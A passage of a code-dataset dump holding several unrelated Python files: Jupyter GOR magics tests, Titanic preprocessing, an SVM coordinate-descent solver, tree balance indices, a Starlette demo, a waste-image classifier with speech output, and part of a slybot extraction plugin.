jupyter.GorMagics()\n self.magics.shell = MagicMock()\n\n @responses.activate\n def test_basic_gor_magics(self):\n setup_responses()\n\n m = jupyter.GorMagics()\n m.handle_exception()\n\n os.environ[\"NEXTCODE_PROFILE\"] = \"notfound\"\n with self.assertRaises(InvalidProfile):\n jupyter.get_service()\n\n del os.environ[\"NEXTCODE_PROFILE\"]\n os.environ[\"GOR_API_KEY\"] = REFRESH_TOKEN\n jupyter.get_service()\n del os.environ['GOR_API_KEY']\n\n @responses.activate\n def test_replace_vars(self):\n setup_responses()\n ret = self.magics.replace_vars(\"hello $not_found;\")\n self.assertIn(\"$not_found\", ret)\n self.magics.shell.user_ns = {\"found\": 1}\n string = self.magics.replace_vars(\"hello $found;\")\n self.assertEqual(\"hello 1;\", string)\n\n self.magics.shell.user_ns = {\"s\": 6}\n string = self.magics.replace_vars(\"hello $s;\")\n self.assertEqual(\"hello 6;\", string)\n\n string = self.magics.replace_vars(\"hello $1;\")\n self.assertEqual(\"hello $1;\", string)\n\n @responses.activate\n @skipUnless(PANDAS_INSTALLED, \"pandas library is not installed\")\n def test_load_relations(self):\n with self.assertRaises(Exception) as ex:\n _ = self.magics.load_relations([\"[not_found]\"])\n self.assertIn(\"Variable 'not_found' not found\", str(ex.exception))\n\n self.magics.shell.user_ns = {\"found\": 1}\n with self.assertRaises(Exception) as ex:\n string = self.magics.load_relations([\"var:found\", \"var:alsofound\"])\n self.assertIn(\"found must be a pandas DataFrame object\", str(ex.exception))\n\n self.magics.shell.user_ns = {\"found\": DataFrame(), \"alsofound\": DataFrame()}\n _ = self.magics.load_relations([\"var:found\", \"var:alsofound\"])\n\n def test_print_error(self):\n jupyter.print_error(\"test\")\n\n def test_load_extension(self):\n setup_responses()\n m = MagicMock()\n with mock.patch(\"nextcode.services.query.jupyter.get_service\"):\n jupyter.load_ipython_extension(m)\n\n with mock.patch(\n \"nextcode.services.query.jupyter.get_service\", side_effect=InvalidToken\n ):\n jupyter.load_ipython_extension(m)\n\n with mock.patch(\n \"nextcode.services.query.jupyter.get_service\",\n side_effect=ServerError(\"Error\"),\n ):\n jupyter.load_ipython_extension(m)\n\n\nclass GorCommandTest(JupyterTest):\n @responses.activate\n @skipUnless(PANDAS_INSTALLED, \"pandas library is not installed\")\n def test_singleline_queryservice(self):\n setup_responses()\n df = self.magics.gor(\"--queryservice 
True Hello\")\n self.assertTrue(df is None)\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"DONE\"\n m.line_count = 100\n m.dataframe.return_value = pd.DataFrame()\n m.running.return_value = False\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"--queryservice True Hello\")\n self.assertTrue(isinstance(df, pd.DataFrame))\n\n @responses.activate\n @skipUnless(PANDAS_INSTALLED, \"pandas library is not installed\")\n def test_singleline_queryserver(self):\n setup_responses()\n df = self.magics.gor(\"Hello\")\n self.assertTrue(df is None)\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"DONE\"\n m.num_lines = 100\n m.dataframe.return_value = pd.DataFrame()\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with mock.patch(\"nextcode.services.query.jupyter.get_queryserver\", return_value=m):\n df = self.magics.gor(\"Hello\")\n self.assertTrue(isinstance(df, pd.DataFrame))\n\n @responses.activate\n def test_not_done(self):\n setup_responses()\n df = self.magics.gor(\"Hello\")\n self.assertTrue(df is None)\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"PENDING\"\n m.line_count = 100\n m.dataframe.return_value = pd.DataFrame()\n m.error = None\n m.running.return_value = False\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"Hello\")\n self.assertTrue(df is None)\n\n @responses.activate\n @skipUnless(PANDAS_INSTALLED, \"pandas library is not installed\")\n def test_multiline_queryservice(self):\n setup_responses()\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"DONE\"\n m.line_count = 999999999\n m.dataframe.return_value = pd.DataFrame()\n m.running.return_value = False\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"--queryservice True Hello\", \"World\\nAnother world\")\n self.assertTrue(isinstance(df, pd.DataFrame))\n\n @responses.activate\n @skipUnless(PANDAS_INSTALLED, \"pandas library is not installed\")\n def test_multiline_queryserver(self):\n setup_responses()\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.dataframe.return_value = pd.DataFrame()\n m.num_lines = 999999\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with mock.patch(\"nextcode.services.query.jupyter.get_queryserver\", return_value=m):\n df = self.magics.gor(\"Hello\", \"World\\nAnother world\")\n self.assertTrue(isinstance(df, pd.DataFrame))\n\n @responses.activate\n def test_operator(self):\n setup_responses()\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"DONE\"\n m.line_count = 100\n m.running.return_value = False\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"myvar <<\", \"gor #dbsnp#\\nAnother line\")\n self.assertTrue(df is None)\n df = self.magics.gor(\"user_data/file.gorz <<\", \"gor #dbsnp#\")\n self.assertTrue(df is None)\n\n @responses.activate\n def test_download(self):\n setup_responses()\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"DONE\"\n m.line_count = 100\n m.running.return_value = False\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with 
mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"file:myfile <<\", \"gor #dbsnp#\\nAnother line\")\n self.assertTrue(df is None)\n\n @responses.activate\n def test_relations(self):\n setup_responses()\n m = MagicMock()\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"Hello\")\n self.assertTrue(df is None)\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"PENDING\"\n m.line_count = 100\n m.dataframe.return_value = pd.DataFrame()\n m.error = None\n m.running.return_value = False\n return m\n\n m = MagicMock()\n m.execute.side_effect = MissingRelations(relations=[\"a\", \"b\"])\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"Hello\")\n self.assertTrue(df is None)\n\n @responses.activate\n def test_keyboard_interrupt(self):\n setup_responses()\n df = self.magics.gor(\"Hello\")\n self.assertTrue(df is None)\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"PENDING\"\n m.dataframe.return_value = pd.DataFrame()\n m.error = None\n m.wait.side_effect = KeyboardInterrupt\n m.cancel.side_effect = QueryError(\"\")\n m.running.return_value = True\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n df = self.magics.gor(\"Hello\")\n self.assertTrue(df is None)\n\n @responses.activate\n @skipUnless(PANDAS_INSTALLED, \"pandas library is not installed\")\n def test_gorls(self):\n setup_responses()\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"DONE\"\n m.line_count = 100\n m.dataframe.return_value = pd.DataFrame()\n m.running.return_value = False\n m.get_results.return_value = {\n \"data\": [\n [\"folder\", \"true\", 0],\n [\"file\", \"false\", 1234512345],\n [\"file\", \"false\", 1234512345678],\n [\"file\", \"false\", 0],\n ]\n }\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n _ = self.magics.gorls(\". 
test\")\n\n @responses.activate\n @skipUnless(PANDAS_INSTALLED, \"pandas library is not installed\")\n def test_gorfind(self):\n setup_responses()\n\n def mock_execute(*args, **kwargs):\n m = MagicMock()\n m.status = \"DONE\"\n m.line_count = 100\n m.dataframe.return_value = pd.DataFrame()\n m.running.return_value = False\n m.get_results.return_value = {\n \"data\": [\n [\"/project/folder\"],\n [\"/project/file\"],\n [\"/project/file\"],\n [\"/project/file\"],\n ]\n }\n return m\n\n m = MagicMock()\n m.execute = mock_execute\n m.project = \"/project/\"\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n _ = self.magics.gorfind(\"test\")\n\n def test_print(self):\n jupyter.print_details(\"dummy\")\n os.environ[\"LOG_QUERY\"] = \"1\"\n jupyter.print_details(\"dummy\")\n os.environ[\"LOG_QUERY\"] = \"\"\n\n def test_query_builder(self):\n qry = jupyter.QueryBuilder()\n qry.defs[\"asdf\"] = \"def\"\n qry.defs[\"ghjk\"] = \"def;\"\n qry.creates[\"qwer\"] = \"create\"\n qry.creates[\"tyu\"] = \"create;\"\n qry.render(\"gor #dbsnp#\")\n m = MagicMock()\n m.project = \"/project/\"\n with mock.patch(\"nextcode.services.query.jupyter.get_service\", return_value=m):\n qry.execute(\"gor #dbsnp#\")\n\n def test_sizeof_fmt(self):\n txt = jupyter.sizeof_fmt(1)\n self.assertEqual(txt, \"1.0B\")\n\n txt = jupyter.sizeof_fmt(0)\n self.assertEqual(txt, \"-\")\n\n txt = jupyter.sizeof_fmt(1024 * 1024)\n self.assertEqual(txt, \"1.0MiB\")\n\n txt = jupyter.sizeof_fmt(1024 * 1024 * 1024 * 1024)\n self.assertEqual(txt, \"1.0TiB\")\n\n txt = jupyter.sizeof_fmt(\n 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024\n )\n self.assertIn(\"Yi\", txt)\n","sub_path":"tests/test_jupyter.py","file_name":"test_jupyter.py","file_ext":"py","file_size_in_byte":12470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"195542487","text":"# using this function, I preprocess the titanic dataset\n# NOTICE: I intentionally did not use this function in my fisrt mission (main.py)\n\ndef preprocess(titanic):\n\n # handling missing values\n\n titanic[\"Age\"] = titanic[\"Age\"].fillna(titanic[\"Age\"].median())\n\n # converting a non-numeric value to a numeric value\n # 0 = male, 1 = female\n titanic.loc[titanic[\"Sex\"] == \"male\", \"Sex\"] = 0\n titanic.loc[titanic[\"Sex\"] == \"female\", \"Sex\"] = 1\n\n titanic[\"Embarked\"] = titanic[\"Embarked\"].fillna(\"S\")\n titanic.loc[titanic[\"Embarked\"] == \"S\", \"Embarked\"] = 0\n titanic.loc[titanic[\"Embarked\"] == \"C\", \"Embarked\"] = 1\n titanic.loc[titanic[\"Embarked\"] == \"Q\", \"Embarked\"] = 2\n\n titanic[\"Fare\"] = titanic[\"Fare\"].fillna(titanic[\"Fare\"].median())\n\n return titanic;","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"189353738","text":"import numpy as np\r\nimport random as rnd\r\nimport time as tm\r\nfrom matplotlib import pyplot as plt\r\nimport math\r\n\r\n# These are for 10 seconds\r\n# eta = 0.0007 , sq : 5400 , random\r\n# 0.0008 , sq, 5491 , random\r\n# 0.0008 , sq, 5415 , cyclic\r\n# 0.0007 , sq, 5458 , cyclic\r\n# 0.0009 , sq, 5384 , cyclic\r\n# 0.00095 , sq, 5366 , cyclic\r\n# 0.001 , sq, 5361 , cyclic\r\n# 0.002 , sq, 5436 , cyclic\r\n# 0.0015 , sq, 5307 , cyclic\r\n# 0.0016 , sq, 5289 , cyclic\r\n# 0.00165 , sq, 5283 , cyclic //Not working now\r\n# 0.00165 , sq, 5279 , random\r\n# Random is 
sometimes giving good answers but sometimes it is horrible\r\n# 0.00003, -, 5252, cyclic\r\n# 0.00005. -, 5234, cyclic\r\n# 0.00007. -, 5224, cyclic\r\n# 0.000072. -, 5224, cyclic\r\n\r\n\r\n# 0.00165 , sq, 5250 , random cyclic\r\n# 0.00007 , - , 5228 , random cyclic\r\n\r\n\r\ndef getCyclicCoord( currentCoord, d ):\r\n\tif currentCoord >= d-1:\r\n\t\treturn 0\r\n\telse:\r\n\t\treturn currentCoord + 1\r\n\r\ndef getRandCoord( d ):\r\n\treturn rnd.randint( 0, d-1 )\r\n\r\nrandpermInner = -1\r\n\r\ndef getRandpermCoord( currentCoord, d ):\r\n# \t# samples = rnd.sample( range(0, d), B )\r\n# \t# return samples\r\n\tglobal randperm, randpermInner\r\n\tif randpermInner >= d-1 or randpermInner < 0 or currentCoord < 0:\r\n\t\trandpermInner = 0\r\n\t\trandperm = np.random.permutation( d )\r\n\t\treturn randperm[randpermInner]\r\n\telse:\r\n\t\trandpermInner = randpermInner + 1\r\n\t\treturn randperm[randpermInner]\r\n\r\ndef batch_grad(theta, C, X, y, j):\r\n\t(n, d) = X.shape\r\n\tX_ = X\r\n\ty_ = y\r\n\tdiscriminant = np.multiply((X_.dot(theta)), y_)\r\n\tg = np.zeros( (n,) )\r\n\tg[discriminant < 1] = -1\r\n\treturn theta[j] + C * 2 * (g * (X_.T[j,:])).dot(np.multiply(y_, (1 - discriminant)))\r\n\r\ndef getObj( X, y, theta, C):\r\n\tw = theta[0:-1]\r\n\thingeLoss = np.maximum( 1 - np.multiply( (X.dot( theta )), y ), 0 )\r\n\treturn 0.5 * w.dot( w ) + C * hingeLoss.dot( hingeLoss )\r\n\r\n\r\ndef solver( X, y, C, timeout, spacing ):\r\n\t\r\n\t(n, d) = X.shape\r\n\tX = np.c_[X, np.ones(n)]\r\n\td = d + 1\r\n\tt = 0\r\n\ttotTime = 0\r\n\ttotalTime = 0\r\n\r\n\t# w is the normal vector and b is the bias\r\n\t# These are the variables that will get returned once timeout happens\r\n\t# w = np.zeros( (d-1,) )\r\n\t# b = 0\r\n\ttic = tm.perf_counter()\r\n\r\n\ttheta = np.zeros( (d,) )\r\n\tcumulative = theta\r\n\tw = theta[0:-1]\r\n\tb = theta[-1]\r\n\teta = 0.00007\r\n\t# B = 5\r\n\tj = -1\r\n\t# global randpermInner randperm\r\n\t\r\n\t# randperm = np.random.permutation( d )\r\n\r\n\tobj_SGD = np.array([getObj(X, y, theta, C)])\r\n\ttime_SGD = np.array([0])\r\n\r\n\ttic1 = tm.perf_counter()\r\n\twhile True:\r\n\t\tt = t + 1\r\n\t\tif t % spacing == 0:\r\n\t\t\ttoc = tm.perf_counter()\r\n\t\t\ttotTime = totTime + (toc - tic)\r\n\t\t\tif totTime > timeout:\r\n\r\n\t\t\r\n\t\t\t\tprint(getObj(X, y, theta, C), t)\r\n\t\t\t\t# print(t)\r\n\t\t\t\treturn (w, b, totTime)\r\n\t\t\telse:\r\n\t\t\t\ttic = tm.perf_counter()\r\n\t\t\r\n\r\n\t\tthetanew = theta\r\n\t\tj = getCyclicCoord(j, d)\r\n\t\t# j = getRandCoord(d)\r\n\t\t# j = getRandpermCoord(j, d)\r\n\r\n\t\tthetanew[j] = theta[j] - (batch_grad(theta, C, X, y, j) * (eta)) \r\n\t\ttheta = thetanew\r\n\r\n\t\ttoc1 = tm.perf_counter()\r\n\r\n\t\t# cumulative = cumulative + theta\r\n\t\tw = theta[0:-1]\r\n\t\tb = theta[-1]\r\n\r\n\treturn (w, b, totTime) # This return statement will never be reached\r\n\r\n# C = 1","sub_path":"Assignment1/assn1/SGD_P1.py","file_name":"SGD_P1.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"196532916","text":"from functools import lru_cache\nfrom math import factorial\n\nfrom biotrees.shape import Shape\nfrom biotrees.shape.iso import isomorphic\n\nfrom biotrees.util import binom2\n\n\n\ndef is_symmetric(t):\n \"\"\"\n Returns True if the root of t is a symmetric node, and False otherwise. 
If t is a leaf, it returns True:\n ex falso quodlibet.\n :return: `bool` instance.\n \"\"\"\n return t.is_leaf() or \\\n all(isomorphic(t.children[0], ch) for ch in t.children[1:])\n\ndef count_symmetries(t):\n \"\"\"\n Returns the number of symmetric interior nodes in t.\n :return: `int` instance.\n \"\"\"\n if t.is_leaf():\n return 0\n else:\n return int(is_symmetric(t)) + sum(count_symmetries(ch) for ch in t.children)\n\ndef count_automorphisms(t):\n if t.is_leaf():\n return 1\n\n aut = 1\n cur_sym_class_rep = None\n cur_sym_class_aut = 1\n cur_sym_class_len = 1\n\n # def iter_len(it):\n # return sum(1 for _ in it)\n\n # def node_aut(child, iso_class):\n # iso_class_len = iter_len(iso_class)\n # return count_automorphisms(child)**iso_class_len * factorial(iso_class_len)\n\n # return prod(starmap(node_aut, groupby(t.children)))\n\n for i in range(len(t.children)):\n ti = t.children[i]\n\n if cur_sym_class_rep is None or not isomorphic(cur_sym_class_rep, ti):\n aut *= cur_sym_class_aut**cur_sym_class_len * factorial(cur_sym_class_len)\n\n cur_sym_class_rep = ti\n cur_sym_class_aut = count_automorphisms(ti)\n cur_sym_class_len = 1\n else:\n cur_sym_class_len += 1\n\n aut *= cur_sym_class_aut**cur_sym_class_len * factorial(cur_sym_class_len)\n return aut\n\n\ndef sackin_index(tree):\n def go(t):\n if t.is_leaf():\n return 0, 1\n\n sackins, kappas = zip(*map(go, t.children))\n node_kappa = sum(kappas)\n node_sackin = sum(sackins) + node_kappa\n return node_sackin, node_kappa\n\n return go(tree)[0]\n\n\ndef binary_colless_index(tree):\n def go(t):\n if t.is_leaf():\n return 0, 1\n\n left, right = t.children\n (cil, nl), (cir, nr) = go(left), go(right)\n return abs(nl - nr) + cil + cir, nl + nr\n\n return go(tree)[0]\n\n\ndef cophenetic_index(tree):\n def go(t):\n if t.is_leaf():\n return 0, 1\n\n cophs, kappas = zip(*map(go, t.children))\n kappa = sum(kappas)\n coph = binom2(kappa) + sum(cophs)\n return coph, kappa\n\n if tree.is_leaf():\n return 0\n else:\n return sum(go(ch)[0] for ch in tree.children)\n\n\ndef binary_quartet_index(tree):\n def go(t):\n if t.is_leaf():\n return 0, 1\n\n ts = t.children\n quartets, kappas = zip(*map(go, ts))\n kappa = sum(kappas)\n\n if kappa < 4:\n return 0, kappa\n\n s0 = sum(quartets)\n\n s3 = sum(binom2(kappas[i1]) * binom2(kappas[i2])\n for i1 in range(len(ts))\n for i2 in range(i1+1, len(ts)))\n\n return s0+s3, kappa\n\n return go(tree)[0]\n\n\n@lru_cache(maxsize=1)\ndef get_quartets():\n q0 = Shape([Shape.LEAF, Shape([Shape.LEAF, Shape([Shape.LEAF, Shape.LEAF])])])\n q1 = Shape([Shape.LEAF, Shape.LEAF, Shape([Shape.LEAF, Shape.LEAF])])\n q2 = Shape([Shape.LEAF, Shape([Shape.LEAF, Shape.LEAF, Shape.LEAF])])\n q3 = Shape([Shape([Shape.LEAF, Shape.LEAF]), Shape([Shape.LEAF, Shape.LEAF])])\n q4 = Shape([Shape.LEAF, Shape.LEAF, Shape.LEAF, Shape.LEAF])\n return [q0, q1, q2, q3, q4]\n\n\ndef quartet_index(tree, vs = range(5)):\n Q = get_quartets()\n t0 = Shape([Shape.LEAF, Shape.LEAF, Shape.LEAF])\n\n def go(t):\n if t.is_leaf():\n return 0, 0, 1\n\n ts = t.children\n quartets, triples, kappas = zip(*map(go, ts))\n kappa = sum(kappas)\n\n if kappa < 3:\n triple = 0\n elif isomorphic(t, t0):\n triple = 1\n else:\n t_s0 = sum(triples)\n\n t_s1 = sum(kappas[i1] * kappas[i2] * kappas[i3]\n for i1 in range(len(ts))\n for i2 in range(i1+1, len(ts))\n for i3 in range(i2+1, len(ts)))\n\n triple = t_s0 + t_s1\n\n if kappa < 4:\n return 0, triple, kappa\n\n for q, v in zip(Q, vs):\n if isomorphic(t, q):\n return v, triple, kappa\n\n s0 = sum(quartets)\n\n s1 = 
sum(binom2(kappas[i1]) * kappas[i2] * kappas[i3] +\n binom2(kappas[i2]) * kappas[i1] * kappas[i3] +\n binom2(kappas[i3]) * kappas[i1] * kappas[i2]\n for i1 in range(len(ts))\n for i2 in range(i1+1, len(ts))\n for i3 in range(i2+1, len(ts)))\n\n s2 = sum(kappas[i1] * triples[i2] + kappas[i2] * triples[i1]\n for i1 in range(len(ts))\n for i2 in range(i1+1, len(ts)))\n\n s3 = sum(binom2(kappas[i1]) * binom2(kappas[i2])\n for i1 in range(len(ts))\n for i2 in range(i1+1, len(ts)))\n\n s4 = sum(kappas[i1] * kappas[i2] * kappas[i3] * kappas[i4]\n for i1 in range(len(ts))\n for i2 in range(i1+1, len(ts))\n for i3 in range(i2+1, len(ts))\n for i4 in range(i3+1, len(ts)))\n\n return s0 + vs[1]*s1 + vs[2]*s2 + vs[3]*s3 + vs[4]*s4, triple, kappa\n\n return go(tree)[0]\n","sub_path":"biotrees/shape/balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"501767679","text":"#Create and initialize the variables\nimport time\nnum = 0\n\n#Ask for a number for the countdown\nnum = int(input(\"Give me a number for the countdown:\\n\"))\n\n#The countdown starts\nfor i in range(1,num):\n\tprint (num-i)\n\t#Pause for 0.5 s\n\ttime.sleep(0.5)\n\n#Announce that the rocket has taken off\nprint (\"The rocket has taken off!!\")","sub_path":"canas-vidaller-manuel/Ejercicio_4.py","file_name":"Ejercicio_4.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"100577445","text":"from starlette.applications import Starlette\nfrom starlette.requests import Request\nfrom starlette.responses import PlainTextResponse\nfrom starlette.routing import Mount, Route, WebSocketRoute\nfrom starlette.staticfiles import StaticFiles\n\n\ndef homepage(request: Request):\n return PlainTextResponse(\"Hello, world!\")\n\n\ndef user_me(request: Request):\n username = \"John Doe\"\n return PlainTextResponse(\"Hello, %s!\" % username)\n\n\ndef user(request: Request):\n username = request.path_params[\"username\"]\n return PlainTextResponse(\"Hello, %s!\" % username)\n\n\nasync def websocket_endpoint(websocket):\n await websocket.accept()\n await websocket.send_text(\"Hello, websocket!\")\n await websocket.close()\n\n\ndef startup():\n print(1111)\n print(\"Ready to go\")\n\n\nasync def startup2():\n print(222)\n print(\"Ready to go222\")\n\n\ndef shutdown():\n print(\"The end\")\n\n\nroutes = [\n Route(\"/\", homepage),\n Route(\"/user/me\", user_me),\n Route(\"/user/{username}\", user), # /user/me\n WebSocketRoute(\"/ws\", websocket_endpoint),\n Mount(\"/static\", StaticFiles(directory=\"static\")),\n]\n\napp = Starlette(\n debug=True,\n routes=routes,\n on_startup=[startup, startup2],\n on_shutdown=[shutdown],\n)\n\n\n# app()\n","sub_path":"asyncio/youtuoo/async_demos/s2/s12.py","file_name":"s12.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"601678241","text":"import torch\nfrom torchvision import transforms, datasets, models\nfrom PIL import Image\nfrom pathlib import Path\nimport sys\nimport os\nfrom gtts import gTTS\nimport mpg123\nfrom torch.autograd import Variable\n\nmodel = torch.load(\"wastemodel.pt\")\n\nloader = transforms.Compose([transforms.Resize(224), transforms.ToTensor()])\n\nimage = Image.open(Path(\"temp.jpg\"))\n\nimage = loader(image).float()\n\nimage = Variable(image, 
requires_grad=True)\n\nimage = image.unsqueeze(0)\n\noutput = model(image)\n\nprint(output)\nprediction = int(torch.max(output.data, 1)[1].numpy())\nprint(prediction)\n\nif (prediction == 0):\n t = (\"Recycle that cardboard please!\")\nif (prediction == 1):\n t = \"Recycle that glass please!\"\nif (prediction == 2):\n t = \"Recycle that metal please!\"\nif (prediction == 3):\n t = (\"Recycle that paper please!\")\nif (prediction == 4):\n t = (\"Recycle that plastic please\")\nif (prediction == 5):\n t = \"Throw that away!\"\n\nmyobj = gTTS(text=t,lang='en',slow=False)\n\nmyobj.save(\"audiotemp.mp3\")\nos.system(\"mpg123 audiotemp.mp3\")\n\nos.remove(\"temp.jpg\")\n","sub_path":"evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"86525833","text":"from __future__ import absolute_import\n\nimport re\n\nfrom collections import OrderedDict\n\nfrom scrapy.http import Request\n\nfrom scrapely.extraction import InstanceBasedLearningExtractor\nfrom scrapely.htmlpage import HtmlPage, dict_to_page\n\nfrom slybot.linkextractor import (HtmlLinkExtractor, SitemapLinkExtractor,\n PaginationExtractor)\nfrom slybot.linkextractor import create_linkextractor_from_specs\nfrom slybot.item import SlybotItem, create_slybot_item_descriptor\nfrom slybot.extractors import apply_extractors\nfrom slybot.utils import htmlpage_from_response, include_exclude_filter\nXML_APPLICATION_TYPE = re.compile('application/((?P<type>[a-z]+)\\+)?xml').match\n\nfrom .extraction import SlybotIBLExtractor\n\n\nclass Annotations(object):\n \"\"\"\n Base Class for adding plugins to Portia Web and Slybot.\n \"\"\"\n\n def setup_bot(self, settings, spec, items, extractors):\n \"\"\"\n Perform any initialization needed for crawling using this plugin\n \"\"\"\n _item_template_pages = sorted((\n [t.get('scrapes'), dict_to_page(t, 'annotated_body'),\n t.get('extractors', [])]\n for t in spec['templates'] if t.get('page_type', 'item') == 'item'\n ))\n self.item_classes = {}\n self.html_link_extractor = HtmlLinkExtractor()\n for schema_name, schema in items.items():\n if schema_name not in self.item_classes:\n if not schema.get('name'):\n schema['name'] = schema_name\n item_cls = SlybotItem.create_iblitem_class(schema)\n self.item_classes[schema_name] = item_cls\n\n # Create descriptors and apply additional extractors to fields\n page_descriptor_pairs = []\n for default, template, template_extractors in _item_template_pages:\n descriptors = OrderedDict()\n for schema_name, schema in items.items():\n item_descriptor = create_slybot_item_descriptor(schema,\n schema_name)\n apply_extractors(item_descriptor, template_extractors,\n extractors)\n descriptors[schema_name] = item_descriptor\n descriptor = descriptors.values() or [{}]\n descriptors['#default'] = descriptors.get(default, descriptor[0])\n page_descriptor_pairs.append((template, descriptors))\n\n self.extractors = SlybotIBLExtractor(page_descriptor_pairs)\n\n # generate ibl extractor for links pages\n _links_pages = [dict_to_page(t, 'annotated_body')\n for t in spec['templates']\n if t.get('page_type') == 'links']\n _links_item_descriptor = create_slybot_item_descriptor({'fields': {}})\n self._links_ibl_extractor = InstanceBasedLearningExtractor(\n [(t, _links_item_descriptor) for t in _links_pages]) \\\n if _links_pages else None\n\n self.build_url_filter(spec)\n\n def handle_html(self, response, seen=None):\n htmlpage = htmlpage_from_response(response)\n items, 
link_regions = self.extract_items(htmlpage)\n        htmlpage.headers['n_items'] = len(items)\n        try:\n            response.meta['n_items'] = len(items)\n        except AttributeError:\n            pass # response not tied to any request\n        for item in items:\n            yield item\n        for request in self._process_link_regions(htmlpage, link_regions):\n            yield request\n\n    def extract_items(self, htmlpage):\n        \"\"\"This method is also called from UI webservice to extract items\"\"\"\n        return self._do_extract_items_from(htmlpage, self.extractors)\n\n    def _do_extract_items_from(self, htmlpage, extractor):\n        extracted_data, template = extractor.extract(htmlpage)\n        link_regions = []\n        for ddict in extracted_data or []:\n            link_regions.extend(ddict.pop(\"_links\", []))\n        descriptor = template.descriptor() if template is not None else None\n        items = []\n        item_cls_name = descriptor.name if descriptor is not None else ''\n        item_cls = self.item_classes.get(item_cls_name)\n        for processed_attributes in extracted_data or []:\n            if processed_attributes.get('_type') in self.item_classes:\n                _type = processed_attributes['_type']\n                item = self.item_classes[_type](processed_attributes)\n                item['_type'] = item.display_name()\n            elif item_cls:\n                item = item_cls(processed_attributes)\n                item['_type'] = item_cls_name\n            else:\n                item = dict(processed_attributes)\n            item['url'] = htmlpage.url\n            item['_template'] = str(template.id)\n            items.append(item)\n\n        return items, link_regions\n\n    def build_url_filter(self, spec):\n        \"\"\"make a filter for links\"\"\"\n        respect_nofollow = spec.get('respect_nofollow', True)\n\n        if spec.get(\"links_to_follow\") == \"none\":\n            url_filterf = lambda x: False\n        elif spec.get(\"links_to_follow\") == \"all\":\n            if respect_nofollow:\n                url_filterf = lambda x: not x.nofollow\n            else:\n                url_filterf = lambda x: True\n        else: # patterns\n            patterns = spec.get('follow_patterns')\n            excludes = spec.get('exclude_patterns')\n            pattern_fn = include_exclude_filter(patterns, excludes)\n\n            if respect_nofollow:\n                url_filterf = lambda x: not x.nofollow and pattern_fn(x.url)\n            else:\n                url_filterf = lambda x: pattern_fn(x.url)\n\n        self.url_filterf = url_filterf\n\n\n    def _filter_link(self, link, seen):\n        url = link.url\n        if self.url_filterf(link):\n            # filter out duplicate urls, later we should handle link text\n            if url not in seen:\n                seen.add(url)\n                request = Request(url)\n                if link.text:\n                    request.meta['link_text'] = link.text\n                return request\n\n    def _process_link_regions(self, htmlpage, link_regions):\n        \"\"\"Process link regions if any, and generate requests\"\"\"\n        if link_regions:\n            for link_region in link_regions:\n                htmlregion = HtmlPage(htmlpage.url, htmlpage.headers,\n                                      link_region, encoding=htmlpage.encoding)\n                for request in self._requests_to_follow(htmlregion):\n                    yield request\n        else:\n            for request in self._requests_to_follow(htmlpage):\n                yield request\n\n    def _requests_to_follow(self, htmlpage):\n        if self._links_ibl_extractor is not None:\n            extracted = self._links_ibl_extractor.extract(htmlpage)[0]\n            if extracted:\n                extracted_regions = extracted[0].get('_links', [])\n                seen = set()\n                for region in extracted_regions:\n                    htmlregion = HtmlPage(htmlpage.url, htmlpage.headers,\n                                          region, encoding=htmlpage.encoding)\n                    for request in self._request_to_follow_from_region(\n                            htmlregion):\n                        if request.url in seen:\n                            continue\n                        seen.add(request.url)\n                        yield request\n            else:\n                for request in self._request_to_follow_from_region(htmlpage):\n                    yield request\n\n    def _request_to_follow_from_region(self, htmlregion):\n        seen = set()\n        for link in 
